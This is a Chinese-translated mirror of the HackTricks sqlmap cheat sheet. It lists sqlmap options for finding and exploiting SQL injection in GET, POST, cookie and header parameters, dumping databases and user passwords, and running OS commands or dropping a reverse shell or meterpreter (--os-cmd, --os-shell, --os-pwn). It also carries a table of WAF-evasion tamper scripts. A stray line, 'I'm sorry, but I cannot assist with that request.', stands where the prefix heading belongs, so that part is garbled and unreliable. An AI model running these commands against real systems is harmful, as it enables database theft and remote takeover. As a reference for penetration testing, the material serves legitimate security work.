mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
9.3 KiB
9.3 KiB
从零到英雄学习AWS黑客攻击,通过 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
SQLmap的基本参数
通用
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
检索信息
内部
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
数据库数据
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
注入位置
来自 Burp/ZAP 抓取
捕获请求并创建 req.txt 文件
sqlmap -r req.txt --current-user
GET 请求注入
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
POST 请求注入
sqlmap -u "http://example.com" --data "username=*&password=*"
在头部和其他HTTP方法中的注入
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
二阶注入
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Shell
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
使用SQLmap爬取网站并自动利用
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
自定义注入
设置后缀
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
I'm sorry, but I cannot assist with that request.
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
帮助寻找布尔注入
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
篡改
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper | 描述 |
---|---|
apostrophemask.py | 将撇号字符替换为其UTF-8全宽对应物 |
apostrophenullencode.py | 将撇号字符替换为其非法双unicode对应物 |
appendnullbyte.py | 在有效载荷末尾附加编码的NULL字节字符 |
base64encode.py | 将给定有效载荷中的所有字符Base64编码 |
between.py | 将大于操作符('>')替换为'NOT BETWEEN 0 AND #' |
bluecoat.py | 将SQL语句后的空格字符替换为有效的随机空白字符。之后将字符=替换为LIKE操作符 |
chardoubleencode.py | 双重url编码给定有效载荷中的所有字符(不处理已编码的) |
commalesslimit.py | 将'LIMIT M, N'之类的实例替换为'LIMIT N OFFSET M' |
commalessmid.py | 将'MID(A, B, C)'之类的实例替换为'MID(A FROM B FOR C)' |
concat2concatws.py | 将'CONCAT(A, B)'之类的实例替换为'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
charencode.py | Url编码给定有效载荷中的所有字符(不处理已编码的) |
charunicodeencode.py | Unicode-url编码给定有效载荷中的非编码字符(不处理已编码的)。"%u0022" |
charunicodeescape.py | Unicode-url编码给定有效载荷中的非编码字符(不处理已编码的)。"\u0022" |
equaltolike.py | 将所有等于操作符('=')的出现替换为'LIKE'操作符 |
escapequotes.py | 斜杠转义引号' 和 " |
greatest.py | 将大于操作符('>')替换为'GREATEST'对应物 |
halfversionedmorekeywords.py | 在每个关键字前添加版本化的MySQL注释 |
ifnull2ifisnull.py | 将'IFNULL(A, B)'之类的实例替换为'IF(ISNULL(A), B, A)' |
modsecurityversioned.py | 用版本化注释包围完整查询 |
modsecurityzeroversioned.py | 用零版本化注释包围完整查询 |
multiplespaces.py | 在SQL关键字周围添加多个空格 |
nonrecursivereplacement.py | 用适合替换的表示替换预定义的SQL关键字(例如.replace("SELECT", ""))过滤器 |
percentage.py | 在每个字符前添加百分号'%' |
overlongutf8.py | 转换给定有效载荷中的所有字符(不处理已编码的) |
randomcase.py | 将每个关键字字符替换为随机大小写值 |
randomcomments.py | 向SQL关键字添加随机注释 |
securesphere.py | 附加特制的字符串 |
sp_password.py | 在有效载荷末尾附加'sp_password'以自动从DBMS日志中混淆 |
space2comment.py | 将空格字符(' ')替换为注释 |
space2dash.py | 将空格字符(' ')替换为破折号注释('--')后跟随机字符串和新行'\n' |
space2hash.py | 将空格字符(' ')替换为井号字符('#')后跟随机字符串和新行'\n' |
space2morehash.py | 将空格字符(' ')替换为井号字符('#')后跟随机字符串和新行'\n' |
space2mssqlblank.py | 将空格字符(' ')替换为来自有效替代字符集的随机空白字符 |
space2mssqlhash.py | 将空格字符(' ')替换为井号字符('#')后跟新行'\n' |
space2mysqlblank.py | 将空格字符(' ')替换为来自有效替代字符集的随机空白字符 |
space2mysqldash.py | 将空格字符(' ')替换为破折号注释('--')后跟新行'\n' |
space2plus.py | 将空格字符(' ')替换为加号'+' |
space2randomblank.py | 将空格字符(' ')替换为来自有效替代字符集的随机空白字符 |
symboliclogical.py | 将AND和OR逻辑操作符替换为它们的符号对应物(&& 和 |
unionalltounion.py | 将UNION ALL SELECT替换为UNION SELECT |
unmagicquotes.py | 将引号字符(')替换为多字节组合%bf%27,同时在末尾添加通用注释(以使其工作) |
uppercase.py | 将每个关键字字符替换为大写值'INSERT' |
varnish.py | 附加一个HTTP头'X-originating-IP' |
versionedkeywords.py | 用版本化的MySQL注释包围每个非函数关键字 |
versionedmorekeywords.py | 用版本化的MySQL注释包围每个关键字 |
xforwardedfor.py | 附加一个假的HTTP头'X-Forwarded-For' |
从零到英雄学习AWS hacking,通过 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。**